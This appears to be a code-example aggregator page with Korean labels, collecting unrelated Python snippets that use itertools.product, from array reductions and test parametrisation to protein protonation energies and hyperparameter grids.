                        QPointF(node.xbins[i + 1], node.ybins[j + 1])))
                 for i, j in itertools.product(range(xs, xe), range(ys, ye))]
    else:
        return [(1, i, j,
                 QRectF(QPointF(node.xbins[i], node.ybins[j]),
                        QPointF(node.xbins[i + 1], node.ybins[j + 1])))
                 for i, j in itertools.product(range(xs, xe), range(ys, ye))]
예제 #30
0
파일: reductions.py 프로젝트: jcorbin/dask
def partial_reduce(func, x, split_every, keepdims=False, dtype=None, name=None):
    """Partial reduction across multiple axes.

    Parameters
    ----------
    func : function
    x : Array
    split_every : dict
        Maximum reduction block sizes in each dimension.

    Example
    -------
    Reduce across axis 0 and 2, merging a maximum of 1 block in the 0th
    dimension, and 3 blocks in the 2nd dimension:

    >>> partial_reduce(np.min, x, {0: 1, 2: 3})    # doctest: +SKIP
    """
    name = name or 'p_reduce-' + tokenize(func, x, split_every, keepdims, dtype)
    parts = [list(partition_all(split_every.get(i, 1), range(n))) for (i, n)
             in enumerate(x.numblocks)]
    keys = product(*map(range, map(len, parts)))
    out_chunks = [tuple(1 for p in partition_all(split_every[i], c)) if i
                  in split_every else c for (i, c) in enumerate(x.chunks)]
    if not keepdims:
        out_axis = [i for i in range(x.ndim) if i not in split_every]
        getter = lambda k: get(out_axis, k)
        keys = map(getter, keys)
        out_chunks = list(getter(out_chunks))
    dsk = {}
    for k, p in zip(keys, product(*parts)):
        decided = dict((i, j[0]) for (i, j) in enumerate(p) if len(j) == 1)
        dummy = dict(i for i in enumerate(p) if i[0] not in decided)
        g = lol_tuples((x.name,), range(x.ndim), decided, dummy)
        dsk[(name,) + k] = (func, g)
    return Array(merge(dsk, x.dask), name, out_chunks, dtype=dtype)
예제 #31
0
파일: lab6a.py 프로젝트: runnerpeople/BMSTU
def permut(iter_,r):
    return [''.join(p) for p in itertools.product(iter_,repeat=r)]
예제 #32
0
	return struct.unpack("Q", sha256(s).digest()[:8])[0]

lala = given_keyid
lala ^= hash_byte(0, 0, hash_len)
for p, c in enumerate(hash_base):
	lala ^= hash_byte(ord(c), p, hash_len)
#lala is now the value we are searching when producing the bytewise sha256 for the remaining 7 positions
possible_hash_products = {}
for p in xrange(len(hash_base), hash_len):
	possible_hash_products[p] = tuple(hash_byte(c, p, hash_len) for c in xrange(256))

#we now create 2 lists with the products from position [-3:-1] and [-6:-4]
products = []
for prod in xrange(2):
	product = []
	for a,b,c in itertools.product(possible_hash_products[hash_len - 3 - (3 * prod)], possible_hash_products[hash_len - 2 - (3 * prod)], possible_hash_products[hash_len - 1 - (3 * prod)]):
		product.append(a^b^c)
	products.append(product)

#we now calculate the product of lala together with the first unknown position
product = []
for prod in possible_hash_products[len(hash_base)]:
	product.append(prod ^ lala)
products.append(product)

products0set = set(products[0])
#we now have to work with the 3 products and find a combination being 0

print "combining..."
t = time.time()
try:
예제 #33
0
    def __init__(self,
                 multi_view,
                 target_info,
                 observed_target_state,
                 form_covariances,
                 reference=None,
                 target_set=None,
                 parametric=False):
        '''
        Parameters
        ----------
        multi_view : `multiple_queries`
           Instance of `multiple_queries`. Attributes
           `objectives`, `score_info` are key
           attributed. (Should maybe change constructor
           to reflect only what is needed.)
        target_info : object
           Passed as first argument to `self.form_covariances`.
        observed_target_state : np.float
           Observed value of the target estimator.
        form_covariances : callable
           Used in linear decomposition of each score
           and the target.
        reference : np.float (optional)
           Reference parameter for Gaussian approximation
           of target.
        target_set : sequence (optional)
           Which coordinates of target are really
           of interest. If not None, then coordinates
           not in target_set are assumed to have 0
           mean in the sampler.
        parametric : bool
           Use parametric covariance estimate?

        Notes
        -----
        The callable `form_covariances`
        should accept `target_info` as first argument
        and a keyword argument `cross_terms` which
        correspond to the `score_info` of each
        objective of `multi_view`. This used in
        a linear decomposition of each score into
        a piece correlated with `target` and
        an independent piece.
        The independent piece is treated as a
        nuisance parameter and conditioned on
        (i.e. is fixed within the sampler).
        '''

        # sampler will draw samples for bootstrap
        # these are arguments to target_info and score_bootstrap
        # nonparamteric bootstrap is np.random.choice(n, size=(n,), replace=True)
        # residual bootstrap might be X_E.dot(\bar{\beta}_E)
        # + np.random.choice(resid, size=(n,), replace=True)

        # if target_set is not None, we assume that
        # these coordinates (specified by a list of coordinates) of target
        # is assumed to be independent of the rest
        # the corresponding block of `target_cov` is zeroed out

        # we need these attributes of multi_view

        self.nqueries = len(multi_view.objectives)
        self.opt_slice = multi_view.opt_slice
        self.objectives = multi_view.objectives

        self.observed_target_state = observed_target_state
        self.shape = observed_target_state.shape

        self.score_cov = []
        for i in range(self.nqueries):
            if parametric == False:
                target_cov, cross_cov = multi_view.form_covariances(
                    target_info,
                    cross_terms=[multi_view.score_info[i]],
                    nsample=multi_view.nboot[i])
            else:
                target_cov, cross_cov = multi_view.form_covariances(
                    target_info, cross_terms=[multi_view.score_info[i]])

            self.target_cov = target_cov
            self.score_cov.append(cross_cov)

        # XXX we're not really using this target_set in our tests

        # zero out some coordinates of target_cov
        # to enforce independence of target and null statistics

        if target_set is not None:
            null_set = set(range(
                self.target_cov.shape[0])).difference(target_set)
            for t, n in product(target_set, null_set):
                self.target_cov[t, n] = 0.
                self.target_cov[n, t] = 0.

        self.target_transform = []
        for i in range(self.nqueries):
            self.target_transform.append(
                self.objectives[i].linear_decomposition(
                    self.score_cov[i], self.target_cov,
                    self.observed_target_state))

        self.target_inv_cov = np.linalg.inv(self.target_cov)
        # size of reference? should it only be target_set?
        if reference is None:
            reference = np.zeros(self.target_inv_cov.shape[0])
        self.reference = reference

        # need to vectorize the state for Langevin

        self.overall_opt_slice = slice(0, multi_view.num_opt_var)
        self.target_slice = slice(
            multi_view.num_opt_var,
            multi_view.num_opt_var + self._reference_inv.shape[0])
        self.keep_slice = self.target_slice

        # set the observed state

        self.observed_state = np.zeros(multi_view.num_opt_var +
                                       self._reference_inv.shape[0])
        self.observed_state[self.target_slice] = self.observed_target_state
        self.observed_state[
            self.overall_opt_slice] = multi_view.observed_opt_state
예제 #34
0
 def __init__(self, points=10):
     self.kgrid = [k for k in product([i/points for i in range(points)],
                                      repeat=3)]
     self.kmax = np.ceil(points/(2*np.sqrt(3)))
     self.eigenvals = {}
예제 #35
0
def main():

    parser = argparse.ArgumentParser(
        description=
        "Assess whether words from the same category cluster together"
        "first considering their sound patterns and then how they correlate"
        "to each other based on their contexts of occurrence")

    parser.add_argument(
        "-c",
        "--corpus",
        required=True,
        dest="corpus",
        help="Specify the path to the training corpus (encoded as .json).")
    parser.add_argument(
        "-C",
        "--celex_folder",
        required=True,
        dest="celex_folder",
        help="Specify the folder where the Celex data are located.")
    parser.add_argument(
        "-O",
        "--output_folder",
        required=True,
        dest="output_folder",
        help=
        "Specify the path of the folder where the logfiles will be stored together with"
        "the summary tables.")
    parser.add_argument(
        "-M",
        "--pos_mapping",
        required=True,
        dest="pos_mapping",
        help=
        "Specify the path of the file containing the mapping from CHILDES to Celex PoS tags."
    )
    parser.add_argument(
        "-p",
        "--precision",
        dest="precision",
        default=5,
        help=
        "Specify the number of outcomes to consider when computing discrimination's precision."
    )
    parser.add_argument(
        "-l",
        "--longitudinal",
        action="store_true",
        dest="longitudinal",
        help="Specify whether to use a longitudinal design (default: False).")

    args = parser.parse_args()

    cues = ['triphones']
    outcomes = ['tokens']
    stress_marker = [True]
    boundaries = [True]
    reduced_vowels = [False]
    distances = ['correlation']
    number_of_cues = [100, 500, 1000]
    number_of_tokens = [50, 250, 500]

    if not os.path.exists(args.output_folder):
        os.makedirs(args.output_folder)

    summary_file = os.path.join(args.output_folder, "LDAk_summary.csv")
    # error_file = os.path.join(args.output_folder, "PoStagging_errors.csv")

    parametrizations = it.product(cues, outcomes, stress_marker, boundaries,
                                  reduced_vowels, distances, number_of_cues,
                                  number_of_tokens)

    time_points = np.linspace(10, 100, 10) if args.longitudinal else [100]
    rows = int(
        np.prod([
            len(cues),
            len(outcomes),
            len(stress_marker),
            len(reduced_vowels),
            len(boundaries),
            len(time_points),
            len(distances),
            len(number_of_cues),
            len(number_of_tokens)
        ]))
    summary_table = pd.DataFrame(index=np.arange(0, rows),
                                 columns=[
                                     "Corpus", "Cues", "Outcomes", "Stress",
                                     "Vowels", "Precision", "Time", "Distance",
                                     "numCues", "numTokens", "Phon_acc",
                                     "Phon_acc_subset", "Phon_baseline",
                                     "Distr_acc", "Distr_acc_subset",
                                     "Distr_baseline"
                                 ])

    ii = 0
    for parametrization in parametrizations:

        print(parametrization)

        cue, outcome, stress, boundary, reduced, distance, how_many_cues, how_many_tokens = parametrization

        uniphones = True if cue == 'uniphones' else False
        diphones = True if cue == 'diphones' else False
        triphones = True if cue == 'triphones' else False
        syllables = True if cue == 'syllables' else False
        vowels = 'reduced' if reduced else 'full'
        sm = "stress" if stress else 'no-stress'
        bound = 'yes' if boundary else 'no'
        training = os.path.splitext(os.path.basename(args.corpus))[0]

        encoded_corpus = corpus_encoder(args.corpus,
                                        args.celex_folder,
                                        args.pos_mapping,
                                        separator='~',
                                        stress_marker=stress,
                                        reduced=reduced,
                                        uniphones=uniphones,
                                        diphones=diphones,
                                        triphones=triphones,
                                        syllables=syllables,
                                        outcomes=outcome,
                                        boundaries=boundary)

        corpus_dir = os.path.dirname(encoded_corpus)

        a, b = [0.001, 0.001
                ] if training == 'aggregate_utterances' else [0.01, 0.01]
        file_paths = ndl(encoded_corpus,
                         alpha=a,
                         beta=b,
                         lam=1,
                         longitudinal=args.longitudinal)

        celex_dict = get_celex_dictionary(args.celex_folder, reduced=reduced)

        for idx, file_path in file_paths.items():

            matrix, cues2ids, outcomes2ids = load(file_path)

            # get the column ids of all perfectly discriminated outcomes at the current time point
            # perfectly discriminated outcomes are considered to be those whose jaccard coefficient
            # between true phonetic cues and most active phonetic cues for the outcome is 1
            discriminated_file = os.path.join(
                corpus_dir, '.'.join([
                    'discriminatedOutcomes',
                    str(int(idx)), ''.join(['at', args.precision]), 'json'
                ]))

            if not os.path.exists(discriminated_file):
                discriminated = find_discriminated(matrix,
                                                   cues2ids,
                                                   outcomes2ids,
                                                   celex_dict,
                                                   stress_marker=stress_marker,
                                                   uniphones=uniphones,
                                                   diphones=diphones,
                                                   triphones=triphones,
                                                   syllables=syllables,
                                                   boundaries=boundaries,
                                                   at=int(args.precision))
                json.dump(discriminated, open(discriminated_file, 'w'))
            else:
                discriminated = json.load(open(discriminated_file, 'r'))

            print()
            print(
                "The discriminated outcomes have been identified (file: %s)." %
                discriminated_file)

            accuracies = subset_experiment(matrix,
                                           discriminated,
                                           how_many_cues=how_many_cues,
                                           how_many_tokens=how_many_tokens)

            summary_table.loc[ii] = pd.Series({
                "Corpus": training,
                "Cues": cue,
                "Outcomes": outcome,
                "Stress": sm,
                "Boundaries": bound,
                "Vowels": vowels,
                "Time": int(idx),
                "Distance": distance,
                "Precision": args.precision,
                "numCues": how_many_cues,
                "numTokens": how_many_tokens,
                "Phon_acc": accuracies[0],
                "Phon_acc_subset": accuracies[1],
                "Distr_acc": accuracies[3],
                "Distr_acc_subset": accuracies[4],
                "Phon_baseline": accuracies[2],
                "Distr_baseline": accuracies[5]
            })
            ii += 1

    if os.path.exists(summary_file):
        summary_table.to_csv(summary_file,
                             sep='\t',
                             index=False,
                             mode="a",
                             header=False)
    else:
        summary_table.to_csv(summary_file, sep='\t', index=False)
예제 #36
0
    return bfgs, svrg, sdca, gd, agd


model_types = ['Linear', 'Logistic', 'Poisson']
l_l2sqs = [1e-3, 1e-2, 1e-1]

fig, axes = plt.subplots(len(model_types),
                         len(l_l2sqs),
                         figsize=(4 * len(l_l2sqs), 3 * len(model_types)),
                         sharey=True,
                         sharex=True)

n_samples = 1000
n_features = 20

for (model_type, l_l2sq), ax in zip(product(model_types, l_l2sqs),
                                    axes.ravel()):
    model = create_model(model_type, n_samples, n_features)

    bfgs, svrg, sdca, gd, agd = run_solvers(model, l_l2sq)
    plot_history([bfgs, svrg, sdca, gd, agd],
                 ax=ax,
                 dist_min=True,
                 log_scale=True)
    ax.legend_.remove()
    ax.set_xlabel('')
    ax.set_ylim([1e-9, 1])

for l_l2sq, ax in zip(l_l2sqs, axes[0]):
    ax.set_title('$\lambda = %.2g$' % l_l2sq)
예제 #37
0
class TestCourseListGetForm(FormTestMixin, UsernameTestMixin,
                            SharedModuleStoreTestCase):
    """
    Tests for CourseListGetForm
    """
    FORM_CLASS = CourseListGetForm

    @classmethod
    def setUpClass(cls):
        super(TestCourseListGetForm, cls).setUpClass()

        cls.course = CourseFactory.create()

    def setUp(self):
        super(TestCourseListGetForm, self).setUp()

        self.student = UserFactory.create()
        self.set_up_data(self.student)

    def set_up_data(self, user):
        """
        Sets up the initial form data and the expected clean data.
        """
        self.initial = {'requesting_user': user}
        self.form_data = QueryDict(
            urlencode({
                'username': user.username,
            }),
            mutable=True,
        )
        self.cleaned_data = {
            'username': user.username,
            'org': '',
            'mobile': None,
            'search_term': '',
            'filter_': None,
        }

    def test_basic(self):
        self.assert_valid(self.cleaned_data)

    def test_org(self):
        org_value = 'test org name'
        self.form_data['org'] = org_value
        self.cleaned_data['org'] = org_value
        self.assert_valid(self.cleaned_data)

    @ddt.data(*product(
        [('mobile', 'mobile_available')],
        [(True, True), (False, False), ('1', True), ('0', False),
         (None, None)],
    ))
    @ddt.unpack
    def test_filter(self, param_field_name, param_field_value):
        param_name, field_name = param_field_name
        param_value, field_value = param_field_value

        self.form_data[param_name] = param_value
        self.cleaned_data[param_name] = field_value
        if field_value is not None:
            self.cleaned_data['filter_'] = {field_name: field_value}

        self.assert_valid(self.cleaned_data)
예제 #38
0
        d.popleft()
for i in d:
    print(i,end=" ")


# # itertools

# itertools.product()

# In[ ]:


from itertools import product
A = map(int,input().split())
B = map(int, input().split())
print(*product(A,B))


# itertools.permutations()

# from itertools import permutations
# s, k = input().split()
# permutations = list(permutations(s, int(k)))
# permutations.sort()
# for i in permutations:
#     print("".join(i))

# itertools.combinations()
# 
# 
예제 #39
0
from itertools import product

print(*product( list(map(int, input().split())), list(map(int, input().split()))))
예제 #40
0
 def to_or_rules(joint):
     new_joint = [expand(parts) for parts in joint]
     joints_set = frozenset([frozenset(prod) for prod in itertools.product(*new_joint)])
     joints_tup = tuple(tuple(sorted(x)) for x in joints_set)
     return joints_tup
예제 #41
0
# coding: utf-8

import itertools

import pytest

from pawn.cards import Card, Deck


@pytest.mark.parametrize('suit,rank',
                         itertools.product(['♣', '♥'], ['A', '3']))
def test_card(suit, rank):
    card = Card(suit=suit, rank=rank)
    assert card.suit == suit
    assert card.rank == rank

@pytest.mark.parametrize('suit,rank',
                         [pytest.mark.xfail((None, None), raises=ValueError),
                          pytest.mark.xfail(('♣', None), raises=ValueError),
                          pytest.mark.xfail((None, '3'), raises=ValueError)])
def test_bad_card(suit, rank):
    assert Card(suit=suit, rank=rank)

def test_deck():
    deck = Deck()
    assert len(deck.cards) == 52

def test_deck_card_class():

    class TestCard(Card):
        pass
예제 #42
0
        communication_radii = [communication_radii]
    for r in communication_radii:
        assert isinstance(r,
                          (float, int)), 'Communication radius must be a float'
    communication_radii = [float(r) for r in communication_radii]
    try:
        modes = ast.literal_eval(args.mode)
    except ValueError:
        modes = args.mode
    if isinstance(modes, str):
        modes = [modes]
    for m in modes:
        assert m == 'dynamic' or m == 'static', 'Mode can only be "static" or "dynamic"'
    schemes = ast.literal_eval(args.scheme)
    assert isinstance(
        schemes,
        collections.Iterable), 'Scheme must be a tuple of list of tuples.'
    if isinstance(schemes[0], str):
        schemes = [schemes]
    all_problems = [
        Arguments(*v) for v in itertools.product(problems, communication_radii,
                                                 modes, schemes)
    ]
    assert all_problems

    if len(all_problems) == 1:
        run_problem(args.internal_output, all_problems[0])
    else:
        assert args.output_results, 'Must specify --output_results'
        run(args.output_results, all_problems)
    if seed_nans:
        frame.loc[1::11, '1st'] = np.nan
        frame.loc[3::17, '2nd'] = np.nan
        frame.loc[7::19, '3rd'] = np.nan
        frame.loc[8::19, '3rd'] = np.nan
        frame.loc[9::19, '3rd'] = np.nan

    return frame


# create input df, keys, and the bins
binned = []
ids = []
for seed_nans in [True, False]:
    for n, m in product((100, 1000), (5, 20)):

        df = seed_df(seed_nans, n, m)
        bins = None, np.arange(0, max(5, df['3rd'].max()) + 1, 2)
        keys = '1st', '2nd', ['1st', '2nd']
        for k, b in product(keys, bins):
            binned.append((df, k, b, n, m))
            ids.append("{}-{}-{}".format(k, n, m))


@pytest.mark.slow
@pytest.mark.parametrize("df, keys, bins, n, m", binned, ids=ids)
def test_series_groupby_value_counts(df, keys, bins, n, m):

    def rebuild_index(df):
        arr = list(map(df.index.get_level_values, range(df.index.nlevels)))
예제 #44
0
    def __lt__(self, other):
        return self.priority < other.priority

    def __eq__(self, other):
        return self.priority == other.priority


print(
    'Total iterations:',
    comb(len(commercial), 3) * comb(len(industry), 3) *
    comb(len(residence), 3))

for item in tqdm(
        itertools.product(itertools.combinations(commercial, 3),
                          itertools.combinations(industry, 3),
                          itertools.combinations(residence, 3))):
    prod = calculateComb(item)
    #    if prod > Max:
    #        print('\n', prod, item)
    #        Max = prod
    results.put(Result(-prod[0], (item, prod[1])))
    pass

cdict = dict()
#for i in range(2):
#    cdict[i] = results.get()
#    print(-cdict[i].priority, cdict[i].builds)
print('==============')
Rec = results.get()
print('最优策略:', Rec.builds[0])
예제 #45
0
    def divide_his(self):
        """Here we divide HIS into two residues - HID, HIE - each with half the pKa value. We
           have to set interaction energies between HIS and other residues and for HIS-HIS
           interactions. Do this based on the values given in the paper"""

        to_drop_his = set()
        new_to_old_his = {}
        handled_interaction_pairs = set()

        items = list(self.residue_variables.items())

        #Find all HIS and split them.
        for key, residue in items:
            name = key[0]
            if name != 'HIS':
                continue

            old_instance_1 = residue.get_instance('1')
            old_instance_2 = residue.get_instance('2')
            old_instance_12 = residue.get_instance('1+2')

            base_name = '_' + '_'.join(key[-2:]) + '_'
            to_drop_his.add(key)

            hid = ResidueVariable("HId" + base_name)
            name = "HId" + base_name + "PROTONATED"
            hid_prot = ResidueInstance(True,
                                       name,
                                       energy=old_instance_1.energy)
            name = "HId" + base_name + "DEPROTONATED"
            hid_deprot = ResidueInstance(False, name)

            hid.instances["PROTONATED"] = hid_prot
            hid.instances["DEPROTONATED"] = hid_deprot

            res_tuple = ("HId", ) + key[-2:]
            self.residue_variables[res_tuple] = hid

            new_to_old_his[hid] = residue

            hie = ResidueVariable("HIe" + base_name)
            name = "HIe" + base_name + "PROTONATED"
            hie_prot = ResidueInstance(True,
                                       name,
                                       energy=old_instance_2.energy)
            name = "HIe" + base_name + "DEPROTONATED"
            hie_deprot = ResidueInstance(False, name)

            hie.instances["PROTONATED"] = hie_prot
            hie.instances["DEPROTONATED"] = hie_deprot

            res_tuple = ("HIe", ) + key[-2:]
            self.residue_variables[res_tuple] = hie

            #Keep a mapping to the original residue object so we can look up
            # interaction energies in the HIS/HIS interactions loop below.
            new_to_old_his[hie] = residue

            #Create interaction energies between newly created residues.
            energy = old_instance_12.energy - old_instance_1.energy - old_instance_2.energy
            self.add_interaction_energy_pair(hid_prot, hie_prot, energy)
            self.add_interaction_energy_pair(hid_prot, hie_deprot, 0.0)
            self.add_interaction_energy_pair(hid_deprot, hie_prot, 0.0)
            self.add_interaction_energy_pair(hid_deprot, hie_deprot,
                                             sys.float_info.max)

        #Delete residue variables from main map.
        for key in to_drop_his:
            del self.residue_variables[key]

        #This loop is order dependent for HIS/HIS interactions. That is why some of the code paths that
        #appear as though they should be duplicate or symmetrical are not
        #and why we compare chain locations.
        # (In case you were wondering why HIe <-> HId is not the same as
        #  HId <-> HIe.)

        #See https://docs.python.org/2/library/itertools.html#itertools.product
        for v, w in product(iter(self.residue_variables.items()), repeat=2):
            his_key, his_residue = v
            other_key, other_residue = w
            his_name, his_chain, his_location = his_key
            other_name, other_chain, other_location = other_key

            if his_name not in ('HId', 'HIe'):
                continue

            his_location = int(his_location)
            other_location = int(other_location)

            his_prot = his_residue.instances["PROTONATED"]
            his_deprot = his_residue.instances["DEPROTONATED"]

            old_his = new_to_old_his[his_residue]
            old_his_instance_1 = old_his.get_instance('1')
            old_his_instance_2 = old_his.get_instance('2')
            old_his_instance_12 = old_his.get_instance('1+2')

            other_prot = other_residue.instances["PROTONATED"]
            other_deprot = other_residue.instances["DEPROTONATED"]

            #Handle create interaction with HId
            if other_name == 'HId':
                # HIS/HIS is order dependent.
                if his_chain > other_chain or his_location >= other_location:
                    continue

                old_other = new_to_old_his[other_residue]
                old_other_instance_1 = old_other.get_instance('1')
                old_other_instance_2 = old_other.get_instance('2')
                old_other_instance_12 = old_other.get_instance('1+2')

                if his_name == 'HIe':
                    energy = self.interaction_energies[old_his_instance_12,
                                                       old_other_instance_12]

                    self.add_interaction_energy_pair(his_prot, other_prot,
                                                     energy)

                    self.add_interaction_energy_pair(his_prot, other_deprot,
                                                     0.0)

                    self.add_interaction_energy_pair(his_deprot, other_prot,
                                                     0.0)

                    energy = (
                        self.interaction_energies[old_his_instance_1,
                                                  old_other_instance_2] -
                        self.interaction_energies[old_his_instance_1,
                                                  old_other_instance_12] -
                        self.interaction_energies[old_his_instance_12,
                                                  old_other_instance_2])

                    self.add_interaction_energy_pair(his_deprot, other_deprot,
                                                     energy)

                elif his_name == 'HId':
                    self.add_interaction_energy_pair(his_prot, other_prot, 0.0)

                    energy = self.interaction_energies[old_his_instance_12,
                                                       old_other_instance_2]
                    self.add_interaction_energy_pair(his_prot, other_deprot,
                                                     energy)

                    energy = (
                        self.interaction_energies[old_his_instance_2,
                                                  old_other_instance_12] -
                        self.interaction_energies[old_his_instance_12,
                                                  old_other_instance_12])
                    self.add_interaction_energy_pair(his_deprot, other_prot,
                                                     energy)

                    energy = self.interaction_energies[old_his_instance_2,
                                                       old_other_instance_2]
                    self.add_interaction_energy_pair(his_deprot, other_deprot,
                                                     energy)

                combinations = self.get_interaction_combinations(
                    (old_his_instance_1, old_his_instance_2,
                     old_his_instance_12),
                    (old_other_instance_1, old_other_instance_2,
                     old_other_instance_12))

                handled_interaction_pairs.update(combinations)

            #Handle create interaction with HIe
            elif other_name == 'HIe':
                # HIS/HIS is order dependent.
                if his_chain > other_chain or his_location >= other_location:
                    continue

                old_other = new_to_old_his[other_residue]
                old_other_instance_1 = old_other.get_instance('1')
                old_other_instance_2 = old_other.get_instance('2')
                old_other_instance_12 = old_other.get_instance('1+2')

                if his_name == 'HIe':
                    self.add_interaction_energy_pair(his_prot, other_prot, 0.0)

                    energy = (self.interaction_energies[old_his_instance_12,
                                                        old_other_instance_1] -
                              self.interaction_energies[old_his_instance_12,
                                                        old_other_instance_12])

                    self.add_interaction_energy_pair(his_prot, other_deprot,
                                                     energy)

                    energy = self.interaction_energies[old_his_instance_1,
                                                       old_other_instance_12]
                    self.add_interaction_energy_pair(his_deprot, other_prot,
                                                     energy)

                    energy = self.interaction_energies[old_his_instance_1,
                                                       old_other_instance_1]
                    self.add_interaction_energy_pair(his_deprot, other_deprot,
                                                     energy)

                elif his_name == 'HId':
                    self.add_interaction_energy_pair(his_prot, other_prot, 0.0)
                    self.add_interaction_energy_pair(his_prot, other_deprot,
                                                     0.0)
                    self.add_interaction_energy_pair(his_deprot, other_prot,
                                                     0.0)

                    energy = (
                        self.interaction_energies[old_his_instance_2,
                                                  old_other_instance_1] +
                        self.interaction_energies[old_his_instance_12,
                                                  old_other_instance_12] -
                        self.interaction_energies[old_his_instance_2,
                                                  old_other_instance_12] -
                        self.interaction_energies[old_his_instance_12,
                                                  old_other_instance_1])
                    self.add_interaction_energy_pair(his_deprot, other_deprot,
                                                     energy)

                combinations = self.get_interaction_combinations(
                    (old_his_instance_1, old_his_instance_2,
                     old_his_instance_12),
                    (old_other_instance_1, old_other_instance_2,
                     old_other_instance_12))

                handled_interaction_pairs.update(combinations)

            #Handle create interaction with non-HIS
            else:
                if his_name == 'HIe':
                    energy = (self.interaction_energies[old_his_instance_12,
                                                        other_prot] -
                              self.interaction_energies[old_his_instance_1,
                                                        other_prot])
                    self.add_interaction_energy_pair(his_prot, other_prot,
                                                     energy)

                    energy = self.interaction_energies[old_his_instance_2,
                                                       other_deprot]
                    self.add_interaction_energy_pair(his_prot, other_deprot,
                                                     energy)

                    self.add_interaction_energy_pair(his_deprot, other_prot,
                                                     0.0)

                    energy = (self.interaction_energies[old_his_instance_1,
                                                        other_deprot] +
                              self.interaction_energies[old_his_instance_2,
                                                        other_deprot] -
                              self.interaction_energies[old_his_instance_12,
                                                        other_deprot])
                    self.add_interaction_energy_pair(his_deprot, other_deprot,
                                                     energy)

                elif his_name == 'HId':
                    energy = self.interaction_energies[old_his_instance_1,
                                                       other_prot]
                    self.add_interaction_energy_pair(his_prot, other_prot,
                                                     energy)

                    energy = (self.interaction_energies[old_his_instance_12,
                                                        other_deprot] -
                              self.interaction_energies[old_his_instance_2,
                                                        other_deprot])
                    self.add_interaction_energy_pair(his_prot, other_deprot,
                                                     energy)

                    energy = (self.interaction_energies[old_his_instance_1,
                                                        other_prot] +
                              self.interaction_energies[old_his_instance_2,
                                                        other_prot] -
                              self.interaction_energies[old_his_instance_12,
                                                        other_prot])
                    self.add_interaction_energy_pair(his_deprot, other_prot,
                                                     energy)

                    self.add_interaction_energy_pair(his_deprot, other_deprot,
                                                     0.0)

                residue_combinations = self.get_interaction_combinations(
                    (old_his_instance_1, old_his_instance_2,
                     old_his_instance_12), (other_prot, other_deprot))
                name_combinations = [(tup[0], tup[1])
                                     for tup in residue_combinations]
                handled_interaction_pairs.update(name_combinations)

        #Clean out unused interaction energies
        self.drop_interaction_pairs(handled_interaction_pairs)
예제 #46
0
        line3=line2.split(',')
        line3=' '.join(line3)
        f4.write(line3)
        f4.write("\n")
f4.close()

def display(OPL):
    if OPL==False:
        return 0
    if OPL==True:
        return 1
    else:
        return OPL
start_time = time.time()

TestPattern=list(itertools.product([0,1],repeat=length))
f5=open('NonTfc1.txt','r')
line1=[]
for line in f5:
    line1.append(line)
f5.close()

f6 = open("output1.txt", 'w')
f6.write(str("||"))
for i in range(0, len(TestPattern)):
    Pattern = TestPattern[i]
    Flag=0
    OutputList = {'a': Pattern[0]}
    count = 97
    for j in range(1,length):
        count = count + 1
예제 #47
0
 def get_interaction_combinations(self, pair1, pair2):
     "Get a list of all pairwise combinations from lists pair1 and pair2."
     product_list = [(x, y) for x, y in product(pair1, pair2)]
     return product_list
예제 #48
0
import itertools
import json
import subprocess

learning_rate = [0.01, 0.1, 1]
batch_size = [128, 512, 2048, 4096]
n_epochs = [10, 50, 100]
optimizer = ['gradient_descent', 'adadelta', 'adam']

config_list = list(itertools.product(learning_rate,
                                     batch_size,
                                     n_epochs,
                                     optimizer))

no_of_configs = len(config_list)

list_of_dicts = []

for config in config_list:
    config_dict = {
        "learning_rate": config[0],
        "batch_size": config[1],
        "n_epochs": config[2],
        "optimizer": {
            "gradient_descent": config[3] == "gradient_descent",
            "adadelta": config[3] == "adadelta",
            "adam": config[3] == "adam"
        }
    }

    list_of_dicts.append(config_dict)
예제 #49
0
    # game.set_render_particles(False)
    # game.set_render_effects_sprites(False)  # Smoke and blood
    # game.set_render_messages(False)  # In-game messages
    # game.set_render_corpses(False)
    # game.set_render_screen_flashes(True)  # Effect upon taking damage or picking up items

    # Makes the screen bigger to see more details.
    game.set_screen_resolution(vzd.ScreenResolution.RES_640X480)
    game.set_window_visible(True)
    game.set_mode(vzd.Mode.SPECTATOR)
    game.init()

    # Creates all possible actions depending on how many buttons there are.
    actions_num = game.get_available_buttons_size()
    actions = []
    for perm in it.product([False, True], repeat=actions_num):
        actions.append(list(perm))

    episodes = 1
    sleep_time = 0.028

    for i in range(episodes):
        print("Episode #" + str(i + 1))

        # Not needed for the first episode but the loop is nicer.
        game.new_episode()
        while not game.is_episode_finished():

            # Gets the state and possibly to something with it
            state = game.get_state()
예제 #50
0
    def consolidate(self):
        """Each residue has multiple protonated and deprotonated states. Here
           we consolidate those into two states for each residue, PROT and DEPROT.
           We take minimums of energies between states in each class. For example,
           assume we have two amino acids, A and B, where A has protonated states 1, 2, 3
           and deprotonated state 4, and B has protonated states 1, 2, and deprotonated
           state 3. Then
           E(A_PROT, B_PROT) = min{E(A1,B1), E(A1,B2), E(A2,B1), E(A2,B2), E(A3,B1), E(A3,B2)},
           E(A_PROT, B_DEPROT) = min{E(A1,B3), E(A2,B3), E(A3,B3)},
           E(A_DEPROT, B_PROT) = min{E(A4,B1), E(A4,B2)}, and
           E(A_DEPROT, B_DEPROT) = E(A4,B3).
           We do not deal with HIS here, it is kept in its 3 states for now.

           After this is finished all unused interaction energies will be removed from
           self.interaction_energies."""

        handled_interaction_pairs = set()

        #See https://docs.python.org/2/library/itertools.html#itertools.combinations
        for v, w in combinations(iter(self.residue_variables.items()), 2):
            v_key, v_residue = v
            w_key, w_residue = w
            v_name = v_key[0]
            w_name = w_key[0]

            #Skip HIS for now
            if v_name == 'HIS' or w_name == 'HIS':
                continue

            v_protinated, v_unprotonated = v_residue.get_prot_and_deprot_instances(
            )
            v_prot_consolidated = v_residue.instances["PROTONATED"]
            v_deprot_consolidated = v_residue.instances["DEPROTONATED"]

            w_protinated, w_unprotonated = w_residue.get_prot_and_deprot_instances(
            )
            w_prot_consolidated = w_residue.instances["PROTONATED"]
            w_deprot_consolidated = w_residue.instances["DEPROTONATED"]

            #For every pairing of v and w (protonated and unprotonated) find the
            # minimum interaction energy and update the interaction map accordingly.
            v_stuff = ((v_protinated, v_prot_consolidated),
                       (v_unprotonated, v_deprot_consolidated))
            w_stuff = ((w_protinated, w_prot_consolidated),
                       (w_unprotonated, w_deprot_consolidated))

            for v_product, w_product in product(v_stuff, w_stuff):
                v_instances, v_consolidated = v_product
                w_instances, w_consolidated = w_product

                energies = []
                #Find all of the pairs
                for v_instance, w_instance in product(v_instances,
                                                      w_instances):
                    energy = self.interaction_energies[v_instance, w_instance]
